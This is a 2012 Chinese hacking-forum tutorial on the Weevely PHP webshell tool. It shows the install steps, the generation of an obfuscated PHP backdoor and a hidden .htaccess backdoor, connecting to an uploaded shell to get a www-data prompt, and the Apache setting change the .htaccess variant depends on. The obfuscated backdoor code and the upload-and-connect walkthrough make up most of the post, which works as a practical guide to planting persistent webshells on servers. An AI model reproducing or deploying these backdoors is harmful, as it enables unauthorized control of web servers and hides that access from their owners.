切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
230 PHP后门 weevely[复制链接]
发表于 2012-8-26 17:49:15 | 显示全部楼层 |!read_mode!
weevely是使用python编写的php webshell的安全测试工具
安装
  1. root@Dis9Team:~# cd /pen/
  2. root@Dis9Team:/pen# mkdir door
  3. root@Dis9Team:/pen# cd door/
  4. root@Dis9Team:/pen/door# git clone git://github.com/epinna/Weevely.git
  5. root@Dis9Team:/pen/door# cd Weevely/
  6. root@Dis9Team:/pen/door/Weevely# ls
复制代码
创建PHP

创建一个密码是123的PHP客服端

  1. root@Dis9Team:/pen/door/Weevely# ./weevely.py generate test
  2.       ________                      __
  3.      |  |  |  |-----.----.-.--.----'  |--.--.
  4.      |  |  |  |  -__| -__| |  | -__|  |  |  |
  5.      |________|_____|____|___/|____|__|___  | v0.7
  6.                                       |_____|
  7.               Stealth tiny web shell

  8. [modules.generate.php] Backdoor file 'weevely.php' created with password 'test'.
  9. root@Dis9Team:/pen/door/Weevely# cat weevely.php
  10. <!--?php $hm="IGpvaW4oYXJyvuYXlfc2xpY2vuUoJGEsJGvuMoJGEpvuLTMpKSvukpKTtlY2hvICc8LvuycuJGsuJz4nO30="; $dfh="PvujMpeyRrPSdzdCvuc7ZWvuNobyvuAnPCcuJvuGsuJz4nO2V2vuYWwoYmFzZTY0X2RlY29vukZShvuwcmVnX3vuJlvu"; $wk="cGxhY2UoYXJyYXkoJy9bXlx3PVxzXvuS8nLCcvXvuHMvuvJyksIGFyvucmF5KCcvunvuLCvucrJyks"; $kb="JGM9J2NvdW50JvuzskYT0kXvu0NPT0tJRTtvupZihyZXNlvudCgkvuYSk9PSd0ZScgJiYgJGMoJvuGEp"; $xxk = str_replace("i","","sitri_reipilaicie"); $mpb = $xxk("k", "", "bkaske6k4_dkekckokde"); $dl = $xxk("rj","","crjrrjerjarjte_rjfrjunrjcrjtrjirjorjn"); $qej = $dl('', $mpb($xxk("vu", "", $kb.$dfh.$wk.$hm))); $qej(); ?-->
复制代码

发现是加密的 上传到SREVER的WEB目录连接

  1. ?>root@Dis9Team:/pen/door/Weevely# ./weevely.py http://5.5.5.4/door.php test
  2.       ________                      __
  3.      |  |  |  |-----.----.-.--.----'  |--.--.
  4.      |  |  |  |  -__| -__| |  | -__|  |  |  |
  5.      |________|_____|____|___/|____|__|___  | v0.7
  6.                                       |_____|
  7.               Stealth tiny web shell

  8. [+] Starting terminal, shell probe may take a while
  9. [+] List modules with <tab> and show help with :show [module name]

  10. www-data@ubuntu:/var/www$ id
  11. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  12. www-data@ubuntu:/var/www$
复制代码


创建 htaccess
  1. root@Dis9Team:/pen/door/Weevely# ./weevely.py generate.htaccess test
  2.       ________                      __
  3.      |  |  |  |-----.----.-.--.----'  |--.--.
  4.      |  |  |  |  -__| -__| |  | -__|  |  |  |
  5.      |________|_____|____|___/|____|__|___  | v0.7
  6.                                       |_____|
  7.               Stealth tiny web shell

  8. [modules.generate.htaccess] Backdoor file '.htaccess' created with password 'test'.
  9. root@Dis9Team:/pen/door/Weevely# cat .htaccess

  10. <Files ~ "^\.ht">
  11.     Order allow,deny
  12.     Allow from all
  13. </Files>

  14. AddType application/x-httpd-php .htaccess
  15. # <?php $lt = str_replace("o","","ostoro_oroeoploaocoe"); $jlv="JvzGM9J2vzNvzvdW50JzskYT0kX0NPT0tvzJRvzTtpZihvzyZXNldCgkYSk9PSd0ZvzScgJiYgJGMovzJGEvzpPjMpeyR"; $ttr="rPSdzdCc7ZWNovzbyAvznPCcuJGsuJvzzvz4nO2V2YWwoYmFvzzZTY0X2RvzlY29kZvzShvzwcmVnX3JlcvzG"; $kfh="vzxhY2UoYXJyYXkoJy9bvzXlx3PvzVxzXS8vznvzLCvzcvXHMvzvJvzyvzksIGFycmF5vzKCcnLCcvzrJyk"; $jg="sIGvzpvaW4oYXJyYXlfvzc2xpY2UvzoJGEsJGvzMoJGEpLTMpKSkpKTtlY2hvzvICc8LvzycvzuJGvzsuJz4nO30="; $ky = $lt("j", "", "basje64j_jdjejcjojdje"); $qg = $lt("rb","","rbcrbrrbearbtrberb_rbfrburbnrbcrbtrbirborbn"); $bw = $qg('', $ky($lt("vz", "", $jlv.$ttr.$kfh.$jg))); $bw(); ?> #
  16. root@Dis9Team:/pen/door/Weevely#
复制代码
关于htaccess
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。国内的大多数虚拟主机就没有这个功能。我所知道的提供这个功能的有康盛世纪(就是Discuz的论坛服务商)。
  启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。
  笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。APACHE开启:
找到/etc/apache2/sites-available 目录的default文件爱你 编辑
  1. <VirtualHost *:80>
  2.         ServerAdmin webmaster@localhost

  3.         DocumentRoot /var/www
  4.         <Directory />
  5.                 Options FollowSymLinks
  6.                 AllowOverride None
  7.         </Directory>
  8.         <Directory /var/www/>
  9.                 Options Indexes FollowSymLinks MultiViews
  10.                 AllowOverride None
  11.                 Order allow,deny
  12.                 allow from all
  13.         </Directory>
复制代码
AllowOverride None 改为 AllowOverride All
重启 上传
  1. root@ubuntu:/etc/apache2/sites-available# /etc/init.d/apache2 restart
  2. * Restarting web server apache2                                                                                            ... waiting                                                                                                        [ OK ]
  3. root@ubuntu:/etc/apache2/sites-available#
复制代码





操千曲而后晓声,观千剑而后识器。
发表于 2012-8-26 19:24:36 | 显示全部楼层
注意
./weevely.py generate test
是指生成一个文件名为 weevely.php的文件密码为test

./weevely.py  generate.htaccess  test
是指生成一个文件名为 .htaccess 的文件密码为test;并且generate.htaccess中间不能有空格



ctrl+c可以在weevely的状态中中断并返回到之前的shell

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-21 09:09

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部